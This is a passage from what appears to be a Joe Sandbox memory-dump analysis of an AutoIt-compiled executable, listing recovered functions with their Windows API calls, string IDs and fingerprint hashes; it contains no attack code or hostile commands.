                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                • Opcode ID: 16719463c1c5ff69b05d3c9db66298ae1df8430712e6754784a7a27c534d537a
                                                                                                                                • Instruction ID: c9907a2134b8439dceaff66e40e5ee13a18798dbfbf18ac9ea918454e620283b
                                                                                                                                • Opcode Fuzzy Hash: 16719463c1c5ff69b05d3c9db66298ae1df8430712e6754784a7a27c534d537a
                                                                                                                                • Instruction Fuzzy Hash: B20144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C47A42C7B5A864CBE5
                                                                                                                                Function 00F584F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F58504
                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F5851A
                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00F58529
                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F58538
                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F58542
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F58549
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 839392675-0
                                                                                                                                • Opcode ID: 6223416c9f76dfa9acf2bbe85442e84a67cb01b6c3dbf2300afab2df0a1cfb33
                                                                                                                                • Instruction ID: 626d91d5bae9ec4749387048db856e553b802fa98b8e36737381e82057d006d0
                                                                                                                                • Opcode Fuzzy Hash: 6223416c9f76dfa9acf2bbe85442e84a67cb01b6c3dbf2300afab2df0a1cfb33
                                                                                                                                • Instruction Fuzzy Hash: 21F09A3320015CBBE7201B629C0EEEF3A7CDFC6B11F10001AFA01A2050EBA02A41E6B4
                                                                                                                                Function 00F5A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00F5A330
                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00F5A341
                                                                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F866D3,?,?,?,?,?,00F1E681), ref: 00F5A34E
                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F866D3,?,?,?,?,?,00F1E681), ref: 00F5A35B
                                                                                                                                  • Part of subcall function 00F59CCE: CloseHandle.KERNEL32(?,?,00F5A368,?,?,?,00F866D3,?,?,?,?,?,00F1E681), ref: 00F59CD8
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F5A36E
                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00F5A375
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                • Opcode ID: dfcb53b5e42d0bc4111b3fff3a36f82815100f7a865012f61e76e24c926af573
                                                                                                                                • Instruction ID: 846822a95df4dee17f89d5f2a75ba4db6767aeb63b21caecfb0474f73da9f9c3
                                                                                                                                • Opcode Fuzzy Hash: dfcb53b5e42d0bc4111b3fff3a36f82815100f7a865012f61e76e24c926af573
                                                                                                                                • Instruction Fuzzy Hash: 25F0E232440209ABD3112F64EC4CDDB7B79FF89312B200122F603910B1CBB69810EB50
                                                                                                                                Function 00F2D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                  • Part of subcall function 00F1BBD9: _memmove.LIBCMT ref: 00F1BC33
                                                                                                                                • __swprintf.LIBCMT ref: 00F2D98F
                                                                                                                                Strings
                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F2D832
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                                • Opcode ID: 754ea6ff0eb812f24009e16f1ab1c484e8c48d6baf86bc628780eb8a4a80c9ab
                                                                                                                                • Instruction ID: c1d405f80f5bcae6d3c95ae2f7c849da438b5f4a4582141eacac68b29302d95f
                                                                                                                                • Opcode Fuzzy Hash: 754ea6ff0eb812f24009e16f1ab1c484e8c48d6baf86bc628780eb8a4a80c9ab
                                                                                                                                • Instruction Fuzzy Hash: 359169725083119FC714FF28DC95DAEB7A4EF85710F00491DF4969B2A2EB24ED84EB92
                                                                                                                                Function 00F6B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F6B4A8
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00F6B5B7
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F6B73A
                                                                                                                                  • Part of subcall function 00F5A6F6: VariantInit.OLEAUT32(00000000), ref: 00F5A736
                                                                                                                                  • Part of subcall function 00F5A6F6: VariantCopy.OLEAUT32(?,?), ref: 00F5A73F
                                                                                                                                  • Part of subcall function 00F5A6F6: VariantClear.OLEAUT32(?), ref: 00F5A74B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                                • Opcode ID: 61fd45ffe0f1b40604ae954b2877a798f45237c8bb0caf15fe291b0e32f54593
                                                                                                                                • Instruction ID: 0eb090654b1aff7900f24eed6d5519eec8dcf273f08bf0b1ef9f54965716ec6d
                                                                                                                                • Opcode Fuzzy Hash: 61fd45ffe0f1b40604ae954b2877a798f45237c8bb0caf15fe291b0e32f54593
                                                                                                                                • Instruction Fuzzy Hash: 19916B75A083019FC710DF24C981A9AB7F4AFC9750F14486DF88ACB351DB35E985EB92
                                                                                                                                Function 00F51050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F510B8
                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F510EE
                                                                                                                                • 6C3C6DE0.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00F510FF
                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F51181
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$CreateInstance
                                                                                                                                • String ID: DllGetClassObject
                                                                                                                                • API String ID: 2994846969-1075368562
                                                                                                                                • Opcode ID: 500f127ae0b3f2c83eb558330d0f64e00ff9baa66d0a6f1fc2d4002ad4f91f30
                                                                                                                                • Instruction ID: 887077a1e8ee627b712d5912c7d1cd3da2e6d8241e84e41cbdc40e8f070355d2
                                                                                                                                • Opcode Fuzzy Hash: 500f127ae0b3f2c83eb558330d0f64e00ff9baa66d0a6f1fc2d4002ad4f91f30
                                                                                                                                • Instruction Fuzzy Hash: 29418C72600608AFDB01CF64CC84B9A7BADFF44355F1080A9EF059F246D7B0E948EBA0
                                                                                                                                Function 00F55A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F55A93
                                                                                                                                • GetMenuItemInfoW.USER32 ref: 00F55AAF
                                                                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00F55AF5
                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD18F0,00000000), ref: 00F55B3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                                • Opcode ID: 6d9212d7bd1293c4cde50367bd5f1ecf8e0b8437ca870183c1665dc2c42ff7bd
                                                                                                                                • Instruction ID: b29ef7168825ab55ebe513fb74374155941f07676ea3b281439fa2d31503d2d0
                                                                                                                                • Opcode Fuzzy Hash: 6d9212d7bd1293c4cde50367bd5f1ecf8e0b8437ca870183c1665dc2c42ff7bd
                                                                                                                                • Instruction Fuzzy Hash: 5B41E171204701AFDB10DF24CCA4B1AB7E4EF88B25F14461DFAA59B2D1C734E908DB62
                                                                                                                                Function 00F70458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00F70478
                                                                                                                                  • Part of subcall function 00F17F40: _memmove.LIBCMT ref: 00F17F8F
                                                                                                                                  • Part of subcall function 00F1A2FB: _memmove.LIBCMT ref: 00F1A33D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$BuffCharLower
                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                • API String ID: 2411302734-567219261
                                                                                                                                • Opcode ID: 9ae696f254695ddf26f4b50b1c7f5753321f9fc03571d23ae14f7f9ba3b4a769
                                                                                                                                • Instruction ID: 18adf746d72ca0fa75607da2ef5e2c379f49034217d1a9d494ea30ae99835b2e
                                                                                                                                • Opcode Fuzzy Hash: 9ae696f254695ddf26f4b50b1c7f5753321f9fc03571d23ae14f7f9ba3b4a769
                                                                                                                                • Instruction Fuzzy Hash: 0B31D47190061AEBCF00EF58CC41AEEB3B5FF04720B148A2AE426972D5CB35E905EB81
                                                                                                                                Function 00F4C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F4C684
                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F4C697
                                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F4C6C7
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 458670788-1403004172
                                                                                                                                • Opcode ID: 2fd6c30320299b96bf32cdf49565908a0952c34cf29a4feacadd7c26a3a987d0
                                                                                                                                • Instruction ID: 661f651063e605e64adcbf2ca69b6af0d52e814d170ae7953128062aec08db36
                                                                                                                                • Opcode Fuzzy Hash: 2fd6c30320299b96bf32cdf49565908a0952c34cf29a4feacadd7c26a3a987d0
                                                                                                                                • Instruction Fuzzy Hash: 6521E471901108AEDB44EB64CC96DFE7BB8DF45360B11911AF826E31E1DB784D4ABB90
                                                                                                                                Function 00F569F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00F131DA
                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00F56A2B
                                                                                                                                • _wcscmp.LIBCMT ref: 00F56A49
                                                                                                                                  • Part of subcall function 00F56D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00F56DBA
                                                                                                                                  • Part of subcall function 00F56D6D: GetLastError.KERNEL32 ref: 00F56DC5
                                                                                                                                  • Part of subcall function 00F56D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00F56DD9
                                                                                                                                • _wcscat.LIBCMT ref: 00F56AA4
                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00F56B0C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreateDirectoryErrorFullLastNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 3499371447-1173974218
                                                                                                                                • Opcode ID: 54afd65d4d8a8ea2aef67298282b1cde2e457522ea870753b36ab0b4a5d30745
                                                                                                                                • Instruction ID: 50e7779c0a3080d785a4854ecc3808b764563ea5d88d2043505ff13947a3ce66
                                                                                                                                • Opcode Fuzzy Hash: 54afd65d4d8a8ea2aef67298282b1cde2e457522ea870753b36ab0b4a5d30745
                                                                                                                                • Instruction Fuzzy Hash: 253123B1C00218AADF50EFA4EC45BDDB7B8AF08710F5055EAEA15E3141EB349B89DF64
                                                                                                                                Function 00F64A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F64A60
                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F64A86
                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F64AB6
                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00F64AFD
                                                                                                                                  • Part of subcall function 00F656A9: GetLastError.KERNEL32(?,?,00F64A2B,00000000,00000000,00000001), ref: 00F656BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1951874230-3916222277
                                                                                                                                • Opcode ID: af119e6e9245743c8a855d5eb9bc59a75af34477e6eca0d601fe0eadd9eae21b
                                                                                                                                • Instruction ID: d6d53a913ddcdb4e2ab05aae9498b76e35cd7aecd2587cfca70162410b178291
                                                                                                                                • Opcode Fuzzy Hash: af119e6e9245743c8a855d5eb9bc59a75af34477e6eca0d601fe0eadd9eae21b
                                                                                                                                • Instruction Fuzzy Hash: 142192B6940208BFEB11EFA4DC85EBB7AECEB88B54F10401AF505A7140DA68AD05A775
                                                                                                                                Function 00F138E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F8454E
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • _memset.LIBCMT ref: 00F13965
                                                                                                                                • _wcscpy.LIBCMT ref: 00F139B5
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F139C6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                • String ID: Line:
                                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                                • Opcode ID: 63893267b6f32bf5d54f6d3d5f59a8d40da980fe647a91c3477439d4651d0c03
                                                                                                                                • Instruction ID: 3bfa57db69c436454a2533058cc50cacd713473e93e5c04ea97cc809f08d0f6a
